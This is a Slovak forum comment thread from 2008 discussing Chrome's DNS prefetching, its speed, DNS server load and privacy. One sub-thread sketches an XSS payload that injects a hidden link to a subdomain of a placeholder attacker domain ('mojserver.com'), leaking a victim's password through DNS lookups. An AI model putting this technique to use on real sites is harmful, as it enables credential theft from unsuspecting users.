| |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| |
Chrome
Od: Rival-e
|
Pridané:
18.9.2008 10:44
Pekne to ti googlaci vymysleli. aj viditelne citit tu funkcionalitu v pozadi, rychlejsie to slape, akoby boli aj stranky dopredu precachovane, ale vidno kolko urobi aj zikanie dns prefetching.
|
| |
Re: Chrome
Od reg.: Uhlik
|
Pridané:
18.9.2008 15:19
DNS prefetching citis na stranke len pri jej prvej navsteve ... vsetko ostatne, co citis potom, je uz len marketing od Google ;o) ...
|
| |
Re: Chrome
Od: rad
|
Pridané:
18.9.2008 15:42
veru tak, ja sa smejem na tom, ze to niekto nazyva vobec technologia. jasne, ze to kazdeho napadlo kto do dns trocha vidi, akurat si uvedomuje ako lahko je to zranitelne a ako zbytocne to zatazuje dns servere... google=hajzli.
|
| |
Re: Chrome
Od: Rival-e
|
Pridané:
18.9.2008 15:44
to je jasne, nakolko to je uz potom nacachovane, no tiez osobne ako hlavny browser pouzivat FF, ale na chrome som to postrehol. A tak isto sa chovaju aj ine browsre, ked to uz dns zaznam mas nacachovany...
|
| |
XSS (koho este stve minimalna dlzka titulku?)
Od reg.: _MMx_
|
Pridané:
18.9.2008 10:52
He? A co presne mi zabrani javascriptom (vlozenym cez nechraneny formular) vygenerovat skrytu linku na nejakedata.mojserver.com?
|
| |
Re: XSS (koho este stve minimalna dlzka titulku?)
Od: clove47
|
Pridané:
18.9.2008 11:05
Nic ale naco by si to robil v kontexte DNS prefetchingu? To uz je lepsie taky formular zneuzit na rozumnejsi druh XSS utoku.
|
| |
Re: XSS (koho este stve minimalna dlzka titulku?)
Od: Myshoo
|
Pridané:
18.9.2008 16:54
myslim ze si chcel povedat crsf
|
| |
Re: XSS (koho este stve minimalna dlzka titulku?)
Od reg.: _MMx_
|
Pridané:
19.9.2008 11:01
Za bezpecnostnu zranitelnost sa zvykne povazovat vsetko, co obchadza hocijaku vlastnost, ktora bola myslena na ochranu. V tomto pripade mi DNS prefetching umozni posielat data na domenu odlisnu od domeny na ktorej sa nachadza javascript. Co obchadza kopec snah oddelit obsah roznych domen.
|
| |
Re: XSS (koho este stve minimalna dlzka titulku?)
Od: dsfvsdvdbsdbsdfb
|
Pridané:
19.9.2008 15:31
Posielat? Umozni ti akurat ziskat IP pomocou DNS, co podla mna tak kriticke nie je.
|
| |
Re: XSS (koho este stve minimalna dlzka titulku?)
Od reg.: _MMx_
|
Pridané:
20.9.2008 13:30
Tym, ze chrome resolvne server password_abcd.mojserver.com, tak autoritativny server pre mojserver.com dostane string password_abcd a moze si s nim spravit co uzna za vhodne.
|
| |
Re: XSS (koho este stve minimalna dlzka titulku?)
Od reg.: Propediotika
|
Pridané:
18.9.2008 14:55
A co by si tym dosiahol?
|
| |
Re: XSS (koho este stve minimalna dlzka titulku?)
Od: jjjjj
|
Pridané:
18.9.2008 19:19
myslím, že to nevie ani on sám :D
|
| |
Re: XSS (koho este stve minimalna dlzka titulku?)
Od reg.: _MMx_
|
Pridané:
19.9.2008 11:08
Napisem do formulara pre novy prispevok nieco v style
[script language="JavaScript"]
document.write("[a style="visibility: hidden" href="" + zistiHeslo() + ".mojserver.com");
[/script]
A kym pochopis o co mi ide tak budem vediet ze tvoje heslo je abcd :-P
|
| |
Re: XSS (koho este stve minimalna dlzka titulku?)
Od reg.: Uhlik
|
Pridané:
19.9.2008 14:44
ale mozno to parsuje len zdrojak a teda domenu z linku vygenerovaneho javascriptom uz nenacachuje ... ale je to len "mozno", lebo som to neskusal ;o) ...
|
| |
Re: XSS (koho este stve minimalna dlzka titulku?)
Od: dfgsdgfsdgf
|
Pridané:
19.9.2008 15:32
Posielat? Umozni ti akurat ziskat IP pomocou DNS, co podla mna tak kriticke nie je.
|
| |
Re: XSS (koho este stve minimalna dlzka titulku?)
Od: risototh
|
Pridané:
20.9.2008 22:22
nahodou nemal zly napad. ono nejde o ziskanie IP. ide o to, ze sa posle dns request na server kde je dana zona nadefinovana, server samozrejme moze vratit nejaku odpoved, alebo aj nx domain, ale hlavne, si to zaloguje :) zaujimavy napad. musim niekedy skusit ;)
|
| |
waveeeee
Od reg.: wavevlna
|
Pridané:
18.9.2008 11:56
inak musim sa pridat je to fakt rychle.. o tom som kedysi len snival
|
| |
pluginy
Od: notedatoto
|
Pridané:
18.9.2008 12:17
Asi v tom chrome nejdu firefoxove pluginy, ze? Skoda, aj by som to skusil.
|
| |
a sakra...
Od: alibaba40
|
Pridané:
18.9.2008 14:09
Odkedy som si nainstaloval - a uz aj odinstaloval - CHROME - zdrbe sa mi aj IE8 beta(standalone...) ak vlozim adresu CTRL+V do prikazoveho riadka... Sudruhovia s Google v tom maju nejaky chaos i ked - za mnoho inych veci ich chvalim - :D
|
| |
Re: a sakra...
Od: alibaba40
|
Pridané:
18.9.2008 14:27
...Oprava - ako adresu do "browsera" IE - :D
|
| |
distribuovany DDoS?
Od: xyzq
|
Pridané:
18.9.2008 14:44
Lutujem tie DNS servery kde uzivatelia pouzivaju Chrome.. akoze radsej si pockam 300 ms viac ako keby som mal zahlcovat DNS nonstop s poziadavkami.. ide to jak to trafiku zbytocne naviac tak aj do zataze DNS.
Mat stranku s pomerne velkym poctom liniek(externych) .. pomaly Chrome bude vykonavat DDoS na DNS ako legitimnu cinnost..
Ak sa mylim poopravte ma :)
|
| |
Re: distribuovany DDoS?
Od reg.: Uhlik
|
Pridané:
18.9.2008 15:17
fakt super vynalez ... v priemere 318ms za tyzden ... cize ak za tyzden pozriem 50 jedinecnych stranok, tak usetrim neuveritelnych 16 sekund svojho drahocenneho case ... parada ... ved za rok su to pri mojom rozsahu jedinecnych stranok mozno aj dve minuty ! ... to sa naozaj oplati robit DoS kvoli tomu, aby sme vsetci usetrili par minut svojho zivota rocne :-/ ...
|
| |
Re: distribuovany DDoS?
Od reg.: TheHacker
|
Pridané:
18.9.2008 15:27
Drsny DoS, DNS je jednym z protokolov, ktore najviac vytazuju internet, daleko za nim na druhom mieste bittorrent, a na tretom mieste HTTP video streamy z youtube.
|
| |
Re: distribuovany DDoS?
Od: m44
|
Pridané:
18.9.2008 20:50
mal tam byt este smajlik, lebo skoro som to nepochopil :)
|
| |
Re: distribuovany DDoS?
Od: abcc
|
Pridané:
18.9.2008 16:47
v priemere 318ms na stranku asi ze zlatko..
|
| |
Re: distribuovany DDoS?
Od reg.: Uhlik
|
Pridané:
19.9.2008 14:36
neviem, ci zlatko, ale uznavam, ze mi vypadlo "na stranku" z tej vety ... ale vypocet dalej je spravny, ze mi to tyzdenne usetri zhruba 16 sekund pri 50 jedinecnych strankach (50 x 0,318 ms) ...
|
| |
Re: distribuovany DDoS?
Od: petok
|
Pridané:
18.9.2008 19:06
najprv sa vsetci trasiete nech je internet a nacitanie co najrychlejsie a ked to tak je tak i tak pi****te..
|
| |
Re: distribuovany DDoS?
Od reg.: Uhlik
|
Pridané:
19.9.2008 15:21
pretoze keby Chrome zacalo pouzivat tolko ludi co IE, tak sa nam zosypu DNS servery ... ved len samotne vysledky vyhladavania cez Google obsahuju mnozstvo domen, ktore Chrome predcitava, takze kombinacia Chrome + Google vyhladavac = pretazenie DNS infrastruktury...
|
| |
Re: distribuovany DDoS?
Od: miso__
|
Pridané:
18.9.2008 15:43
mimochodom, ta funkcia sa da v Chrome deaktivovat
|
| |
Re: distribuovany DDoS?
Od reg.: OmeGa
|
Pridané:
18.9.2008 16:30
a teraz mi povedz kolko BFU si to deaktivuje? vsak vdaka tomu maju rychlejsi internet...
Suhlasim ze toto nieje spravna vec, DNSka su uz teraz vytazene, bol tu o tom aj clanok, ze ak sa nieco nespravi, tak internet nebude pomaly koli rychlosti, ale koli DNS serverom. toto im naozaj pomoze..
|
| |
chronium
Od reg.: Kveri
|
Pridané:
18.9.2008 19:57
od vcera pouzivam chronium (chrome dev) a priemer mam 116.6
|
| |
Firefox + Fasterfox
Od: jaaaa
|
Pridané:
22.9.2008 8:17
Toto iste robí aj rozšírenie pre Firefox s nazvom Fasterfox. A myslim, ze aj cachuje stranky dopredu (nie som si moc isty). A tiez nie som si moc isty ci funguje aj na FF3.x ale na Firefoxe 2.x funguje spolahlivo
|